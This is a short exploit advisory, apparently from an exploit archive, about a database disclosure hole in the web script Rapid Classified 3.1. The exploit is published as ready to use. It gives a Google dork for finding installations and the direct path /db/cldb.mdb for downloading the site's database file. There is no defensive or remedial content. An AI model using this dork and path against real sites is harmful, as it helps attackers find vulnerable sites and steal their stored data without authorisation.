id: 4336
date: 12/02/2008
title: Rapid Classified 3.1 (cldb.mdb) Database Disclosure Vulnerability
author: CoBRa_21
cves: 

=================================================================
Rapid Classified 3.1 (cldb.mdb) Database Disclosure Vulnerability
=================================================================


---------------------------------------------------------------------------

Script Name: Rapid Classified

Version: v3.1

Google Dork: intext:©2003-2008 RC v3.1 Developed by: GA Soft

Author: CoBRa_21

---------------------------------------------------------------------------
 
Exploit:
 
http://localhost/[PATH]/db/cldb.mdb
 
 
---------------------------------------------------------------------------



#  0day.today [2023-03-22]  #